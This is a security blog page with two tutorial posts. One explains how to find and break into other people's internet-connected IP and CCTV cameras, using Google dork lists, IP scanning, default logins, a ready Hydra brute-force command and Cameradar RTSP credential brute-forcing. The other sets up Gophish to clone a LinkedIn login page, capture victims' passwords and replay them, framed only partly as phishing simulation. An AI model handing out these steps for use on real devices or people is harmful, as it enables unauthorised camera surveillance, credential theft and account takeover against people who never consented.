Friday, June 16, 2017

Exploiting CCTV and IP Cameras

Surveillance cameras has helped launch the biggest attacks on the Internet. The Internet of Things (IoT) is now a major force in the weaponization of DDoS and the cameras being one they are used as botnets to fuel attacks. This blog article shows how they can be compromised and exploited by attackers using various techniques.Surveillance Cameras is a group term used to encompass both CCTV and IP Cameras. There are some major differences between Closed Circuit Television (CCTV) systems and Internet Protocol (IP) cameras. IP cameras are the modern choice, though business owners and property managers prefer to use CCTV cameras to monitor large spaces. Below is a brief comparison of some of the main features of each type of cameras.

CCTV cameras
IP cameras
Sends video back through coaxial or UTP cables.
Broadcasts video as a digital stream over an IP network to an NVR (network video recorder).
Video is recorded on a physical DVR which can be connected to the internet for remote viewing.
Use of SD cards, allowing them to record locally, or sends video via the internet to an NVR
Power and network cables run between each camera and the base station.
Uses PoE (Power over Ethernet) making it unnecessary to run power cables.
Because cabling is required, CCTV cameras all have to be in one location.
Because cabling is not always required, IP cameras do not all need to be kept in one location.
Cameras typically offer lower resolution of 960 x 480, but some systems offer HD resolution.
Some cameras feature increased resolution of 4096 x 2160. Standard resolution tends to be 1080p HD.
Primarily provides video surveillance without advanced features.
Includes advanced features such as analytics, advanced motion detection, and remote focus.
There is a physical limit to the number of cameras that can be added to the network.
Unlimited cameras can be added to the network.
2-way audio for communication with people on the other end.
2-way audio for communication with people on the other end.
Uses television to broadcast signals.
Uses Wi-Fi and bandwidth.

In this article we will concentrate more on IP Cameras since they are the mostly used and it provides a direct communication between the computer network and the internet hence it can be accessed anywhere on the live feed using any device.

Google Dorks
Google dorks are Google Search queries that find vulnerable systems or sensitive information about databases, websites or any IoT device.
The following type of queries can be used to find vulnerable security cameras in the internet:
Inurl:”CgiStart?page=”
inurl:/view.shtml
intitle:”Live View / – AXIS
inurl:view/view.shtml
inurl:ViewerFrame?Mode=
inurl:ViewerFrame?Mode=Refresh
inurl:axis-cgi/jpg
inurl:axis-cgi/mjpg (motion-JPEG) (disconnected)
inurl:view/indexFrame.shtml
inurl:view/index.shtml
inurl:view/view.shtml
liveapplet
intitle:”live view” intitle:axis
intitle:liveapplet
allintitle:”Network Camera NetworkCamera” (disconnected)
intitle:axis intitle:”video server”
intitle:liveapplet inurl:LvAppl
intitle:”EvoCam” inurl:”webcam.html”
intitle:”Live NetSnap Cam-Server feed”
intitle:”Live View / – AXIS”
inurl:indexFrame.shtml Axis


Shodan
is also great search engine that lets one find specific types of computers or anything imaginable connected to the internet in this case the IP Cameras. Using filters you can get a list of exploitable IP cameras.

Angry IP Scanner
Also known as ipscan, is an open source network scanning tool that can be used to scan ip addresses and ports on your network. Angry IP scanner tool works by just inputting a network range to scan. For first time use, make sure you add the web-detect feature by going to Tools>Fetchers. 
In an internal network it easy to input the network range, start with your default gateway network address to the last network address. When the scan is complete it will show you the IP address assigned to the IP camera. The IP Camera may be configured to be outside the network. 
myip.ms is an online IP database, it is good for finding any Public IPv4 network address of any Country or Province. Since you will not get the exact IP address for the Camera you have to input a network range to scan, preferably from the first to the last octet tof the subnet (0-255).
After a successful scan note the name of the cameras on the Web detect tab.

The following are the keywords to look out for from the web detect tab, they do identify the IP cameras;
RomPager/4.07 UPnP/1.0
Uc –httpd 1.0.0
DVRDVS-Webs
Microhttpd
Webs
Hikvision-Webs
iBall –Baton


Copying the IP address on your web browser you will be presented with a web login page. Their are different IP cameras models out in the market. This article will also try to point out how poor the security is and how it can be easily exploited.
You should first try logging in with default passwords. System administrators leave their devices with default username and password combinations for a variety of reasons. Simply not knowing that a password needs to be changed or assuming that their perimeter firewall will protect them from unauthorized access are some of the reasons for doing so, which is a stupid idea. During an attack phase, attackers spent most of their time going through products specification, configuration to find any way to get into a device or system.
Different Camera models have different default logins, try googling for them for your case. Some IP cameras like the Avigilon and new Axis require password creation during first login which is a good practice, other Models like Hikvision,Panasonic, Nothern, Samsung and Bosch have adopted the same by upgrading their firmware to require unique password creation.
After a successful login some cameras need plugins for them to work on the web page, you can it download them from the same page or from the manufacture website.

Non default credentials do not keep attackers away, the passwords can be cracked. Poor password creation is exploited at this point, the simpler the passwords are the easier they can be cracked.
Hydra is powerful tool that can be used to crack the IP/CCTV cameras passwords or other password secured applications. You will need a wordlist which is can be found in default in Kali Linux distro or you create a custom one for yourself.

hydra -s 80 -l admin -P /path/to/your/wordlist.txt -e ns -t 16 targetIP http* 
The arguments of the above hydra command is shown below:
-s 80 -- define port number
-l admin -- default login name 'admin'
-P -- path to your wordlist
-e --- empty password
ns --- try login as password and try empty password
http --- port name for attack

Most of the commercial IP cameras out there utilize RTSP as a mechanism for streaming their video feeds. Real Time Streaming Protocol (RTSP) is a network control protocol designed for use in entertainment and communications systems to control streaming media servers. The protocol is used for establishing and controlling media sessions between end points. Clients of media servers issue VCR-style commands, such as play, record and pause, to facilitate real-time control of the media streaming from the server to a client.
RTSP just like HTTP protocol runs on specific ports i.e ports 554 (default RTSP port) and 8554 (default emulated RTSP port). RTSP has different structure and control commands but is textual in its format hence easy to use after learning the basic commands behind it.
RTSP is not that in the limelight but not to the Security professionals since it is exploitable. Their is a tool; Cameradar that hacks its way into RTSP CCTV cameras. It is available in Github. It has got the following cool features:
  • Detects open RTSP hosts on any accessible subnetwork.
  • Gets the public info (hostname, port, camera model.)
  • Brute forces its own way into them to get their stream route.
  • Brute forces its own way into them to get the username and password of the cameras
  • Generates thumbnails from them to check if the streams are valid.
  • It creates a Gstreamer pipeline to check if they are properly encoded.
  • Prints a summary of all the information.


Cameradar uses docker an application that automates the deployment of applications inside software containers.
Before you run the tool, ensure you install all the dependencies depending on your Linux distribution package manager:
sudo pacman -S docker

Start the docker service:
sudo systemctl start docker
Install the tool by git cloning it from Github then build it.
git clone https://github.com/EtixLabs/cameradar.git
cd cameradar/deployment
sudo rm *.tar.gz
sudo ./build_last_package.sh
docker-compose build cameradar
docker-compose up cameradar

Run Cameradar from the terminal:
sudo docker run \
-v /tmp/thumbs:/tmp/thumbs \
-e CAMERAS_PORTS=your_ports \
-e CAMERAS_SUBNETWORKS=your_subnetwork \
ullaakut/cameradar:tag

The arguments of the above command is explained below:
tmp/thumbs - path to the saved thumbnails
CAMERAS_SUBNETWORKS - a subnet (e.g.: 172.16.100.0/24) or even an IP (e.g.: 172.16.100.10).
CAMERAS_PORTS - a port, multiple ports and even port ranges (e.g.: 554,8554,9000-9554)
tag - lows you to specify a specific version for cameradar.

After a successful scan and brute force the generated thumbnails will be in /tmp/thumbs on your machine and in the container. The results would be outputted in JSON objects like:
{
"address" : "127.0.0.1",
"ids_found" : true
"password" : "123456",
"path_found" : true,
"port" : 554,
"product" : "Vivotek FD9381-HTV",
"protocol" : "tcp",
"route" : "/live.sdp",
"service_name" : "rtsp",
"state" : "open",
"thumbnail_path" : "/tmp/thumbs/127.0.0.1/1234567.jpg",
"username" : "admin"
}


VLC Media Player can be used to view the RTSP live stream from Media>Stream>Network option in the this format :
username:password@address:port/route

Wednesday, June 7, 2017

Phishing with Gophish+Mail-in-a-box (MIAB)

Phishing is often the first phase of an attack after reconnaissance . This is mainly because it works well since it involves psychological manipulation of the human mind. To counter this 'Phishing as a Service' routine has been introduced which involves using tools that can create fully automated campaigns. Employees are trained on how to spot phishing emails, and then get tested with mock phishing emails. The percentage of those who fall victim decreases with each round though it is impossible to get to a zero response rate. This article tries to show how to configure Gophish; one of the phishing simulators out there with Mail-in-a-Box a dedicated Linux Mail Server.

Gophish is a simple phishing toolkit that allows the easy management of phishing campaigns. It handles the malicious web pages that you create, email templates and SMTP configs. It is available for all OS types.
MIAB is an easy-to-deploy mail server in a box. It helps individuals take back control of their email by defining a one-click, easy-to-deploy SMTP+everything else server, a mail server in a Linux box. Both of the two applications use a VPS for hosting, this blog post does concentrate mostly on Gophish and how to configure the two to run on one Linux box to save on hosting costs. For a complete detailed guide on how to set-up MIAB go to https://mailinabox.email/guide.html or for a video set-up guide head out to this YouTube video https://youtu.be/9WOmkoEYMIg

Installing Gophish

This takes places on the MIAB Linux Server. Assuming you have already set up MIAB and it already running download the latest version of Gophish:
wget https://github.com/gophish/gophish/releases/download/v0.3.0/gophish-v0.3-linux-64bit.zip

Once that is downloaded unzip the folder:
unzip gophish-v0.3-linux-64bit.zip -d Gophish

Change directory into that folder and  make the Gophish file executable:
cd Gophish
chmod +x Gophish


Open the config.json file and edit the listen_urls, paths to TLS certificates and keys:
vim config.json

MIAB use TLS certificates provisioned by Let’s Encrypt for your domains. You are going to use the certificates and keys on our Gophish application. The path to the certificates is: /home/userdata/ssl/. Next change the Listen url to 0.0.0.0, this allows Gophish to listen on all interfaces. After the edits the config.json file should look something like this:
{
"admin_server" : {
"listen_url" : "0.0.0.0:3333",
"use_tls" : true,
"cert_path" : "/home/user-data/ssl/ssl_certificate.pem",
"key_path" : "/home/user-data/ssl/ssl_private_key.pem"
},

"phish_server" : {
"listen_url" : "0.0.0.0:80",
"use_tls" : true,
"cert_path" : "/home/user-data/ssl/ssl_certificate.pem",
"key_path": "/home/user-data/ssl/ssl_private_key.pem"
},

"db_name" : "sqlite3",
"db_path" : "gophish.db",
"migrations_prefix" : "db/db_"
}

You can change the admin server port to your liking but the one of the phish server must be 80 since it will be the url that points to the malicious cloned web pages and also port 80 is a well-known port for http servers. This though would lead to errors because MIAB uses the same port on its Nginx Webserver. You would have to disable Nginx web server: 
service nginx stop

You can use netstat to confirm the services running on various ports: 
netstat –tulpn

NOTE that you will not be able to access you web-mail and that is why you must ensure your MIAB is running before you configure for Gophish. Remember the end goal is phishing and minimizing VPS hosting costs since MIAB was created to run on a fresh machine dedicatedly.

Now you can go ahead and start Gophish:
./gophish

Gophish should now be started and if you look at the terminal that you started Gophish you should see that two servers have been created; the admin interface which allows us to manage our phishing campaigns and the phishing server to create malicious clones.

Proceed to your browser and log in by using the credentials of admin:gophish You can change that from the settings tab. After you have logged into you are presented with the dashboard. From here you can navigate to the Sending Profiles tab on the left-hand side of the site and click New Profile. You then proceed to fill out the form presented with the mail details from MIAB. Fill in your email-address, SMTP details and password. Click on Send Test Email to ensure the details have been entered correctly.

You can then move on to the Landing Page. This is where the victim will be directed after clicking a link on the email message. Just like before click New Page and in the form entering the required details. Choosing a Page Name that you can remember, later on, I recommend using the same name as whatever website it is you are going to clone. Then you are able to import the site that you want to clone by clicking import site by inputting the legit web URL. With the new popup that appears, you simply add the URL of the site you want to clone. Once that is done you select Capture Submitted Data and Capture Passwords. You can then add a Redirect to the site i.e. the actual page the victim will be redirected to. In this case LinkedIn log in page. Note sometimes after cloning sites and running a campaign some may not work because of some JavaScript codes. You will have to manually go through the code and delete the unneeded codes. The “POST” function in the forms is the important part of the code.

Moving on to Email Templates, you again name the template with the name you used before on the landing page. You can then import an email template. In Gmail you are able to view the email source and copy this into the Email Content on Gophish. You then have the to change the links to point to Landing Page, this will allow any link in the email to automatically send us to the phishing cloned page. You can then save this template.


You then add Users and Groups, to which you add the Group Name. This is where the target email addresses are stored. Add the first and last name, an email and their position and add this to the list. You can also bulk import users into the group.

The last step is launching a campaign. You need to enter all the information you previously entered in our other steps along with naming the campaign and adding the URL of the site to which will capture the data. In this case, you have set-up and bought a domain that you had set up with MIAB. You can the schedule when you want the email to be sent. Also be sure you check the time-zone of the VPS you are using it to complement with where you are before you launch the campaign.



You can now see the active campaign in your dashboard as you wait for the email to be received. Within the dashboard you can also see a timeline of the campaign when the campaign was created, the email sent, the email opened if the link was clicked and if there was any data submitted. The submitted data allows you to see what data was entered. You can also replay the credentials and this allows you to automatically login to that site with them credentials.


References
https://getgophish.com/documentation/https://github.com/gophish/gophish/releases
https://mailinabox.email/
https://www.skyhighnetworks.com/cloud-security-blog/top-phishing-test-tools-and-simulators/

[root@e13olf]# exit